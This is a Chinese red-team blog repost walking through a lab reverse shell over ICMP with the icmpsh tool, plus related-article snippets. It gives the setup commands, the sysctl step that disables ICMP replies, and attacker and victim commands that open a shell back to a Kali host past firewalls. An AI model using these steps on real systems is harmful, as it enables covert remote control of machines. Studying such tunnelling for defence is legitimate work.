icmp协议_利用ICMP(icmpsh)协议反弹Shell 渗透红队笔记

最新推荐文章于 2024-03-28 22:18:44 发布
最新推荐文章于 2024-03-28 22:18:44 发布
阅读量337 收藏
点赞数
文章标签: icmp协议 icmp端口

渗透攻击红队

一个专注于红队攻击的公众号

9c4a1e413778fb723b5bb3c8cc40e9f9.png

大家好,这里是 渗透攻击红队 的第  篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),每周一更。

8043ce18ee5b1835a61c3b869e9e72a8.gifICMP隧道

ICMP隧道是一个比较特殊的协议。在一般的通信协议里,如果两台设备要进行通信,肯定要开放端口,而在ICMP协议下就不需要。最常见的ICMP消息为Ping命令的回复,攻击者可以利用命令得到比回复更多的ICMP请求。在通常情况下,每个Ping命令都有相对应的回复与请求。

在一些条件下,如果攻击者使用各类隧道技术(HTTP,DNS,常规正反端口转发等)操作都失败了,常常会通过ping命令访问远程计算机,尝试进行ICMP隧道,将TCP/UDP数据封装到ICMP的ping数据包中,从而穿过防火墙(通常防火墙不会屏蔽ping数据包),‍实现不受限制的网络访问。

常见的ICMP隧道工具有:icmpsh、PingTunnel、icmptunnel、powershell icmp等。

利用ICMP协议反弹Shell

icmpsh

icmpsh工具使用简单,是一个跨平台工具,运行不需要管理员权限。

icmpsh下载地址:

https://github.com/inquisb/icmpsh

0c7188ed8ca71d85630306c5d7656555.png

使用icmpsh需要安装python的impacket类库,以便对于各种协议进行访问。

安装Python-impacket库:

apt-get install python-impacket

安装库如果出现这种情况:

8c727c4be6b535e01484ecdc48ff1848.png

那么更新一下APT库就好了:

sudo apt-get updatesudo apt-get upgrade

如果没有pip的话那么安装pip:

1.下载+解压+安装setuptools包:root@kali:~#:wget https://pypi.python.org/packages/source/s/setuptools/setuptools-18.5.tar.gzroot@kali:~#:tar zxvf setuptools-18.5.tar.gzroot@kali:~#:cd setuptools-18.5root@kali:~#:python setup.py buildroot@kali:~#:python setup.py install2.下载+解压+安装piproot@kali:~#:wget https://pypi.python.org/packages/source/p/pip/pip-7.1.2.tar.gzroot@kali:~#:tar zxvf pip-7.1.2.tar.gzroot@kali:~#:cd pip-7.1.2root@kali:~#:sudo python setup.py install

如果还是不行那么就使用这条命令安装:

pip2 install impacket

42349c1c12bfefb25b02d8ed7fc42739.png

因为icmpsh工具要代替系统本身的ping命令的应答程序,所以需要输入如下命令来关闭本地系统的ICMP答应(如果要恢复系统答应,则设置为0),否则Shell的运行会不稳定.

sysctl -w net.ipv4.icmp_echo_ignore_all=1

实验完成后开启系统ping的话将最后的1改为0即可

在这里我说一下,运行run.sh会出错,不知道为啥:

8505d76fedb030fb0d839cff3e5e58ba.png

于是我使用了icmpsh的Python脚本运行:

python icmpsh_m.py 192.168.217.129【kali】 192.168.217.132【win7】

65b984237ba04767b77b3ce5434e9478.png

然后在Win7上执行命令:

icmpsh.exe -t 192.168.217.129

07dc90c3718f721ee446f7b5047d3217.png

这个时候就成功反弹shell到kali:

51ba2cb03e6958407043364bf43f0c8b.png

参考文章:

https://pentestlab.blog/2017/07/28/command-and-control-icmp/

adb84787b6743cfcdd87493b0cf362f0.png

渗透攻击红队

一个专注于渗透红队攻击的公众号

d668265230fcab0fbcf5baec226bfaae.png e9c56f8d292a6a0eaee10bc8ea453cd3.png点分享 f2281ab216900a2ca0a6fb17f80015df.png点点赞 95989427744716a511a4ba0ecd01a959.png点在看
weixin_39872257
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
红队渗透打点工具-FindUpload
03-07
FindUpload是一款红队打点工具,帮助渗透测试人员批量url快速发现文件上传点和登录框,提高渗透测试效率和减少手工发现时间。
icmp反弹shell 简介
whatday的专栏
04-09 969
目录 第一节 轶事 第二节 技术原理 第三节 ICMP反弹shell 第一节 轶事 首次听说icmp隧道,要从免费上网说起。当年的网费还是挺贵的,大学生上个网还是容易“破产”呀。当你的网费耗尽后,网管服务器就会拦截你的网络请求,但是只拦截了TCP和UDP协议,放过了ICMP协议,ping ip还是可以的,于是就开始琢磨利用icmp隧道将访问转发到自己的一台放置在公网中的代理,利用代...
内网渗透ICMP(icmpsh) 协议反弹Shell
The current road is different, love needs to distinguish between right and wrong
04-09 5054
简介 最常见的ICMP消息为Ping命令的回复,通过ping命令访问远程计算机,尝试进行ICMP隧道,将TCP/UDP数据封装到ICMP的ping数据包中,从而穿过防火墙(通常防火墙不会屏蔽ping数据包)。 常见的ICMP隧道工具有:icmpsh、PingTunnel、icmptunnel、powershell icmp等。 这里使用 icmpsh跨平台工具,python版本 < python3。 实验环境 kali:192.168.95.128 windows7:192.168.9
内网穿透_ICMP_icmpsh
最新发布
tubug的博客
03-28 946
常见的ICMP隧道工具有:icmpsh、PingTunnel、icmptunnel、powershell icmp等。数据包(例如:ping操作)的传输过程中,当目标主机不可达,或者请求超时,都是ICMP在运作(生成相应的错误信息)这样,当其他设备向你的机器发送 ICMP 请求时,icmpsh 可以截获这些请求并作出响应,而不是系统本身去响应。使用 icmpsh 工具时,它会监听网络上的 ICMP 请求,并模拟系统的 ICMP 去响应。为了防止系统本身去响应icmp,所以要关闭本机的icmp响应。
ICMPSH的学习ICMP反弹shell
来到了学渣的博客
06-04 1346
ICMP隧道 最常见的ping命令就是利用ICMP协议,使用该协议反弹shell,两台机器不需要开放端口ICMP隧道简单好用。 实验环境 Kali 192.168.10.144 win7 192.168.10.129 kali安装好icmpsh工具 root@kali:~# git clone https://github.com/inquisb/icmpsh.git 安装icmpsh的依赖包 root@kali:~# apt-get install python-impacket 执行之前最重要
nishangICMP反弹shell攻击日志分析
weixin_44253823的博客
11-08 633
ICMP包一般不被防火墙拦截,使用ICMP协议作为连接容易通过防火墙。 攻击过程复现。 复现环境 win7:192.168.0.73。powershell导入nishang框架。https://blog.csdn.net/weixin_44253823/article/details/102972355 kali:192.168.0.162。安装icmpsh工具。 https://gi...
隐藏通信隧道技术之icmpsh反弹shell(网络层ICMP隧道)
bring_coco的博客
01-05 770
优势:不需要开放端口就能通信 常见ICMP的消息是ping命令,通过ping可以得到一些回复 如果HTTP,DNS正反向端口转发不行时候可以尝试ICMP隧道 建立基础:只要能ping通,可以将TCP/UDP数据封装到数据包中,然后利用ping的数据包来穿透防火墙。 实验环境: 1.虚拟机中进行 (kali作为外网机器,monowall1是分隔内外网的防火墙,win7,win2012是两台内网机器) 2.kali的ip:10.0.78.29 Monowall1的ip:1.1.1.1 Win7的ip:1.1.
渗透测试/红队/src全方位测试字典
09-01
这是安全测试人员的伴侣。它是安全评估期间使用的多种类型的列表的集合,收集在一个位置。列表类型包括用户名、密码、...目标是使安全测试人员能够将此存储库拉到新的测试框中,并可以访问可能需要的每种类型的列表。
信息安全_数据安全_红队技术漫谈.pdf
08-29
3. **渗透测试分支树(NPT-BT)**:包括信息收集、物理安全、社会工程、开发利用、后渗透渗透测试全过程。 此外,FSRTer还需要具备高效自学、严谨学习态度、创新思维、流利英语等软实力,这些是提升技能和适应...
近源渗透红队视角WiFi.pdf
03-24
无线网络已经事实上成为了企业移动化办公的重 要基础设施,但由于普遍缺乏有效的管理,部署与 使用人员的安全意识和专业知识的不足,导致AP分 布混乱,设备安全性脆弱,无线网络也越来越多的 成为黑客入侵企业内网...
利用icmpsh建立icmp隧道反弹shell
xj28555的博客
09-25 734
首先在kali上安装icmpsh软件,软件地址https://github.com/inquisb/icmpsh.git 我们可以直接用git克隆过来git clonehttps://github.com/inquisb/icmpsh.git 然后我们还需要来安装python-impacket类库以保证对TCP、UDP、ICMP协议的访问 pip2 install impacket 接下来我们还需要关闭我们之前的ping命令应答程序,这样可以防止内核自己对ping包进行响应。 sysc.
icmpsh.zip
05-17
内部网络中的大多数系统都位于防火墙和公司代理之后,以便控制入站和出站Internet流量。防火墙可以阻止反向并绑定TCP连接。但是大多数情况下允许ICMP流量。因此,可以将此协议用作隐蔽通道,以便获取shell并在目标主机上远程执行命令。
icmpsh解决运行报错
weixin_30655219的博客
11-22 540
运行./run.sh报错 sysctl -w net.ipv4.icmp_echo_ignore_all=1 >/dev/null python icmpsh_m.py 攻击机ip 目标机ip 目标机运行:icmpsh.exe -t 攻击机ip -d 500 -b 30 -s 128 转载于:https://www.cnblogs.com/websecyw/p/10001...
通过ICMP协议反弹SHELL并执行命令
Fly_鹏程万里
05-23 3623
前言内网中的大多数系统都位于防火墙和企业代理之后,以便控制入口以及出口流量。防火墙可以拦截到反连的shell,但ICMP协议基本上是不拦截的。因此,为了获得shell并在目标主机上执行命令,可以使用ICMP协议作为隐藏通道进行连接。使用icmpsh(https://github.com/inquisb/icmpsh)工具可用来执行此攻击。推特上的大牛@Bernardo Damele已经将其导入到他...
浅谈内网工具ICMP的使用以及遇到的坑
markecheng的博客
11-26 1037
内网渗透之隐藏通信隧道ICMP协议以及ICMP工具的使用 ICMP的使用简介 -t host :要向其发送ping请求的主机ip地址。此选项是必需的! -r:发送一个包含字符串“Test1234”的测试icmp请求,然后退出。这是用来测试连接的。 -d milliseconds:请求之间的延迟(毫秒) -o milliseconds:毫秒响应超时(毫秒)。如果没有及时收到回复,奴隶将增加一个空白计数器。如果计数器达到某个限制,则从机将退出。如果收到响应,计数器将被设置回0。 -b num :空白数限制(退出
shell 截取ip地址最后一位_利用icmpsh建立icmp隧道反弹shell
weixin_30128407的博客
12-01 145
首先在kali上安装icmpsh软件,软件地址https://github.com/inquisb/icmpsh.git我们可以直接用git克隆过来git clone https://github.com/inquisb/icmpsh.git然后我们还需要来安装python-impacket类库以保证对TCP、UDP、ICMP协议的访问pip2 install impacket接下来我...
内网渗透系列:内网隧道之icmpsh
闵行小鱼塘
04-10 1387
本文研究ICMP隧道的一个工具,icmpsh
icmpshicmp反弹shell
weixin_45729208的博客
03-31 326
一,技术原理 向ping www.baidu.com时,本机会先向百度的服务器发送ICMP请求包,如果请求成功了,则百度服务器会回应ICMP的响应包 引用百度百科: ICMP(Internet Control Message Protocol)Internet控制报文协议。它是TCP/IP协议簇的一个子协议,用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用等网络本身的消息。这些控制消息虽然并不传输用户数据,但是对于用户数据的传递起着重要的作用。 二,实验环境 攻击机
MULTI-CLOUD RED TEAM – PT 1.pdf
10-06
在"MULTI-CLOUD RED TEAM – PT 1"这份文档中,主要聚焦于多云环境下的网络安全渗透测试,特别是针对亚马逊网络服务(AWS)的安全评估。这份研究涵盖了以下几个关键知识点: 1. **AWS角色枚举与设计**:文章提到了一...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值